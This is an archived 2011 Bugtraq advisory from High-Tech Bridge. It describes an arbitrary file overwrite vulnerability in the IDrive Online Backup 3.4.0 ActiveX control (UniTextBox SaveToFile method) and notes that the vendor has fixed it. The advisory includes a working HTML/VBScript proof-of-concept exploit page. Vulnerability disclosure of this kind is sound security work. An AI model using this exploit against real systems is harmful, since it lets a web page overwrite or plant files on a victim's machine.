| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 6 Jul 2011 13:23:27 +0200 (CEST) From: advisory@...ridge.ch To: bugtraq@...urityfocus.com Subject: IDrive Online Backup ActiveX control Insecure Method Vulnerability ID: HTB23025 Reference: http://www.htbridge.ch/advisory/idrive_online_backup_activex_control_insecure_method.html Product: IDrive Online Backup Vendor: Pro Softnet Corporation ( http://www.idrive.com ) Vulnerable Version: 3.4.0 and probably prior Tested on: 3.4.0 Vendor Notification: 15 June 2011 Vulnerability Type: ActiveX Control Insecure Method Status: Fixed by Vendor Risk level: High Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) Vulnerability Details: High-Tech Bridge SA Security Research Lab has discovered a vulnerability in IDrive Online Backup ActiveX control, which can be exploited to overwrite arbitrary files. The vulnerability is caused due to the UniBasicPack.UniTextBox (UniBasic100_EDA1811C.ocx) ActiveX control including the insecure "SaveToFile()" method. This can be exploited to rewrite arbitrary files in the context of the currently logged-on user. The following PoC code is available: <html> <object classid='clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\File_name_to_rewrite_or_create" arg2=1 arg3="New_File_Content" target.Text=arg3 target.SelStart=0 target.SelEnd=Len(arg3) target.SaveToFIle arg1,arg2 End Sub </script> </html> Solution: Upgrade to the most recent version
Powered by blists - more mailing lists